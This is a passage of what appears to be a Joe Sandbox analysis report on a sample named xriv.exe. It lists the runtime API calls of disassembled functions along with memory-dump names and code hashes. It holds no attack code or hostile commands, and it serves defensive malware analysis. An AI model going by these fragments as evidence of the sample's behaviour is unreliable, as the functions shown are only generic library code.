                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221381
                                                                          • Part of subcall function 0122129E: _free.LIBCMT ref: 01221393
                                                                        • _free.LIBCMT ref: 012216FA
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 0122171C
                                                                        • _free.LIBCMT ref: 01221731
                                                                        • _free.LIBCMT ref: 0122173C
                                                                        • _free.LIBCMT ref: 0122175E
                                                                        • _free.LIBCMT ref: 01221771
                                                                        • _free.LIBCMT ref: 0122177F
                                                                        • _free.LIBCMT ref: 0122178A
                                                                        • _free.LIBCMT ref: 012217C2
                                                                        • _free.LIBCMT ref: 012217C9
                                                                        • _free.LIBCMT ref: 012217E6
                                                                        • _free.LIBCMT ref: 012217FE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: 35ea17f8507beeed58743e65c5bb28e2ffab85caeea71ac9e56b25ba6be7781d
                                                                        • Instruction ID: 321844a25d18bdee5ba5ac957523f359892af832ab53ddd1e61d6d5611a9cc7e
                                                                        • Opcode Fuzzy Hash: 35ea17f8507beeed58743e65c5bb28e2ffab85caeea71ac9e56b25ba6be7781d
                                                                        • Instruction Fuzzy Hash: 1C318231A2031AEFEB25AE7CE844F6A77E9EF50650F10881AE65CD7190DF70E990C714
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 01218CC2
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 01218CE9
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 01218DF5
                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 01218ED0
                                                                        • _UnwindNestedFrames.LIBCMT ref: 01218F57
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 01218F72
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 2123188842-393685449
                                                                        • Opcode ID: d8420efc8bfad237c63643b2094aaaab5c195ab6ede81e28f71acf3beaeb5e1f
                                                                        • Instruction ID: b3cdaf75c63031fe3c190832768693d8c7f0162d2c42a21e714f03f498ee5854
                                                                        • Opcode Fuzzy Hash: d8420efc8bfad237c63643b2094aaaab5c195ab6ede81e28f71acf3beaeb5e1f
                                                                        • Instruction Fuzzy Hash: DFC16C7182020AEFDF29DFA8C8C09AEBBF5BF34314F44455AEA116B219D731DA51CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 0121DE42
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 0121DE4E
                                                                        • _free.LIBCMT ref: 0121DE59
                                                                        • _free.LIBCMT ref: 0121DE64
                                                                        • _free.LIBCMT ref: 0121DE6F
                                                                        • _free.LIBCMT ref: 0121DE7A
                                                                        • _free.LIBCMT ref: 0121DE85
                                                                        • _free.LIBCMT ref: 0121DE90
                                                                        • _free.LIBCMT ref: 0121DE9B
                                                                        • _free.LIBCMT ref: 0121DEA9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 6adb38837d5ed9bf551679270c779d620e7a894842bd903b17d322bc8b5cddde
                                                                        • Instruction ID: fb74a292b325c3c64b264397d26797198795e76baf3edda8bc7d92e5db314cea
                                                                        • Opcode Fuzzy Hash: 6adb38837d5ed9bf551679270c779d620e7a894842bd903b17d322bc8b5cddde
                                                                        • Instruction Fuzzy Hash: B521B77691414DEFCB01EFD4D884DEE7BF8BF28640F0085A6E6199B124DB71EA84CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e120962bc5d3021f765e6163db77562ba838a3d3752cda1ba1342750051386f
                                                                        • Instruction ID: 4ff9c8c68af432f1aaa9aaf2945ff2ee53c5ac9577f8214dcb7c37f65d9998a8
                                                                        • Opcode Fuzzy Hash: 0e120962bc5d3021f765e6163db77562ba838a3d3752cda1ba1342750051386f
                                                                        • Instruction Fuzzy Hash: 35C10171E2425AAFDB25CF9CD884BFDBBB1AF5A310F048059E601A7381C7B49941CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$___from_strstr_to_strchr
                                                                        • String ID:
                                                                        • API String ID: 3409252457-0
                                                                        • Opcode ID: e3f4694f6eed2d41b91280b7823630c8403cff03872d6590d1edd35005d0172e
                                                                        • Instruction ID: f53ace9a1ec2c20980e0679507def07fbeaa87e99a9983e612d1b6954162914e
                                                                        • Opcode Fuzzy Hash: e3f4694f6eed2d41b91280b7823630c8403cff03872d6590d1edd35005d0172e
                                                                        • Instruction Fuzzy Hash: BA5130B0924367BFEB21AFA99888A6D7BF4AB15314F00456AFA1497281EE718140CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 012185A7
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 012185AF
                                                                        • _ValidateLocalCookies.LIBCMT ref: 01218638
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 01218663
                                                                        • _ValidateLocalCookies.LIBCMT ref: 012186B8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 072af639818f7cd4eb62a615adf2a47c541e0d3fd4f46c635d7fd419825dbbb4
                                                                        • Instruction ID: b33d647d32e644997ba3579f490da0a3359de9d95f926deb96c390160ed22632
                                                                        • Opcode Fuzzy Hash: 072af639818f7cd4eb62a615adf2a47c541e0d3fd4f46c635d7fd419825dbbb4
                                                                        • Instruction Fuzzy Hash: DB41E134A2024AAFCF10DF68C8C4AAEBBE5EF64314F048555E9149B259D7319A41CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 0-537541572
                                                                        • Opcode ID: ddb7823123423567c7d34c96ffb20bb69c05542fdeb25e901b8f4047833b5dc9
                                                                        • Instruction ID: 03c3e652c0835b518c7a67cdd13c5bda5cfca449991868504d3c677180e6f53e
                                                                        • Opcode Fuzzy Hash: ddb7823123423567c7d34c96ffb20bb69c05542fdeb25e901b8f4047833b5dc9
                                                                        • Instruction Fuzzy Hash: 8E21DB72A61222BFFB33CA699C55EEE77D49F75660F170220EE15A728CD670DD0086D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 01221405: _free.LIBCMT ref: 0122142A
                                                                        • _free.LIBCMT ref: 0122148B
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 01221496
                                                                        • _free.LIBCMT ref: 012214A1
                                                                        • _free.LIBCMT ref: 012214F5
                                                                        • _free.LIBCMT ref: 01221500
                                                                        • _free.LIBCMT ref: 0122150B
                                                                        • _free.LIBCMT ref: 01221516
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                                        • Instruction ID: 28ccf18d8f225f9a6240bf3fcc677ef7a71e63e116151d0a9dd52a7dc4a9c291
                                                                        • Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                                        • Instruction Fuzzy Hash: AE119A32520B19FAD620FFB1DC09FEB77DCEF20B00F418C15A39DAA094DA28A561C680
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetConsoleCP.KERNEL32(?,01205140,00000000), ref: 01222B40
                                                                        • __fassign.LIBCMT ref: 01222D1F
                                                                        • __fassign.LIBCMT ref: 01222D3C
                                                                        • WriteFile.KERNEL32(?,01205140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01222D84
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01222DC4
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01222E70
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                        • String ID:
                                                                        • API String ID: 4031098158-0
                                                                        • Opcode ID: 45b8a41c429829842664686edfd0d2ad43e2b8528334406db6ca1bc9b7b6fa30
                                                                        • Instruction ID: 49bdea188c1dbe509ca5b9697f4307f15b388f04284f43abb311285251acb07e
                                                                        • Opcode Fuzzy Hash: 45b8a41c429829842664686edfd0d2ad43e2b8528334406db6ca1bc9b7b6fa30
                                                                        • Instruction Fuzzy Hash: D6D1BD71D10269EFCF25CFE8D8809EDBBB5BF58314F28016AE915BB241D631AA46CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,01218887,01218476,01217AC4), ref: 0121889E
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 012188AC
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 012188C5
                                                                        • SetLastError.KERNEL32(00000000,01218887,01218476,01217AC4), ref: 01218917
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 62ff502d497b0a0943db771fb24d608d2f2471a2b74338d927050aafcfb30b23
                                                                        • Instruction ID: 0d1ac351fe8e06c45ce79b4eb400d8ff3c1d948f6ea492ab63fcc6217ceaf860
                                                                        • Opcode Fuzzy Hash: 62ff502d497b0a0943db771fb24d608d2f2471a2b74338d927050aafcfb30b23
                                                                        • Instruction Fuzzy Hash: A701B53353D3135EEA35997C7CC897A66D5EF316F57210329F620545DDEE9288005681
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 01220033
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                        • API String ID: 0-2143882575
                                                                        • Opcode ID: 4ecbe47de8e28cfb123fe411be1c1589a180f6aecc7854385ef48de529886c62
                                                                        • Instruction ID: df1133949bb22bfb91876589908ec580cea2a0704c81d337616fe9ca4a53c6af
                                                                        • Opcode Fuzzy Hash: 4ecbe47de8e28cfb123fe411be1c1589a180f6aecc7854385ef48de529886c62
                                                                        • Instruction Fuzzy Hash: 5B210472620227BFEB21AF698C84D7F73EDEF142647004514FA1993250EF75EE4187A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcsrchr
                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                        • API String ID: 1752292252-4019086052
                                                                        • Opcode ID: 5d36ea3ec63ce2b849845c61f80e3db1cd976fa0808325e59763ffb47cec6455
                                                                        • Instruction ID: 0cd3da7b371c87dad0a6f89132afe73dbe89a52e03a3fccd4f0fb680ccb96d79
                                                                        • Opcode Fuzzy Hash: 5d36ea3ec63ce2b849845c61f80e3db1cd976fa0808325e59763ffb47cec6455
                                                                        • Instruction Fuzzy Hash: EF01C83B734727356725A11EAD0173B1BF88FB6BB0726002EFF44E7188EE48D5024190
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-
                                                                        • API String ID: 0-2084034818
                                                                        • Opcode ID: 585cd3bc02568e748e631f2cd6e1d36b7b9e036050510c9f64718a8e775d1e75
                                                                        • Instruction ID: 9d7cb0ab0ea139033e2adb31ec61d9ab6488d336d0a5e294d339eb93604663d9
                                                                        • Opcode Fuzzy Hash: 585cd3bc02568e748e631f2cd6e1d36b7b9e036050510c9f64718a8e775d1e75
                                                                        • Instruction Fuzzy Hash: 67110B32A21227FBEF32CE2D9C55E6E37D69F116B8B110510EA06A728DD770ED40C6D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0121A9D8,0121E000,?,0121A9A0,0121AF26,?,0121E000), ref: 0121A9F8
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0121AA0B
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0121A9D8,0121E000,?,0121A9A0,0121AF26,?,0121E000), ref: 0121AA2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: 620ad4c59e8434c959d70ea43dfc68aedcac4d0ab7152c1c4387335cedfec903
                                                                        • Instruction ID: 505d10351ef0fc67db6224cb53dff555cb7d9bf35b90d20ba2d0f4fa09a07b11
                                                                        • Opcode Fuzzy Hash: 620ad4c59e8434c959d70ea43dfc68aedcac4d0ab7152c1c4387335cedfec903
                                                                        • Instruction Fuzzy Hash: 50F08231511219FBEB31DF55EA0DBDE7EB4EF04755F110064E601A2058CB788F00EB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(01544058,01544058,?,7FFFFFFF,?,?,01226325,01544058,01544058,?,01544058,?,?,?,?,01544058), ref: 0122610C
                                                                        • __alloca_probe_16.LIBCMT ref: 012261C2
                                                                        • __alloca_probe_16.LIBCMT ref: 01226258
                                                                        • __freea.LIBCMT ref: 012262C3
                                                                        • __freea.LIBCMT ref: 012262CF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alloca_probe_16__freea$Info
                                                                        • String ID:
                                                                        • API String ID: 2330168043-0
                                                                        • Opcode ID: 677d0a137ce12094204f07a4b3a43cd2e003a3f3af66f9838fac60a4edf20cb7
                                                                        • Instruction ID: a8178812eda32b49b250562dc7e2034804f3df1e8aaa68399d5890d894df3200
                                                                        • Opcode Fuzzy Hash: 677d0a137ce12094204f07a4b3a43cd2e003a3f3af66f9838fac60a4edf20cb7
                                                                        • Instruction Fuzzy Hash: BA81B773D2022BBBEF219E988C41EEF7BB6EF5A250F190155EE05A7241D625DD40C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 01224A18
                                                                        • __alloca_probe_16.LIBCMT ref: 01224ADE
                                                                        • __freea.LIBCMT ref: 01224B4A
                                                                          • Part of subcall function 0121DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121DB6E
                                                                        • __freea.LIBCMT ref: 01224B53
                                                                        • __freea.LIBCMT ref: 01224B76
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1423051803-0
                                                                        • Opcode ID: 7cdd767adfa282c9c702a4da5ea4a35e498c2b0ca1fcf6063c299934e656de64
                                                                        • Instruction ID: 23010cccef5330166a4754d70b0cc071d66d8c157a9ea08864ec47df2ef5c6f4
                                                                        • Opcode Fuzzy Hash: 7cdd767adfa282c9c702a4da5ea4a35e498c2b0ca1fcf6063c299934e656de64
                                                                        • Instruction Fuzzy Hash: 7951D572920267BBEB25AF68DC41FBF7AA9EF54750F150129FE14AB140F770DC1086A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0121B0E0), ref: 0121B1D0
                                                                        • GetFileInformationByHandle.KERNEL32(?,?), ref: 0121B22A
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0121B0E0,?,000000FF,00000000,00000000), ref: 0121B2B8
                                                                        • __dosmaperr.LIBCMT ref: 0121B2BF
                                                                        • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0121B2FC
                                                                          • Part of subcall function 0121B524: __dosmaperr.LIBCMT ref: 0121B559
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
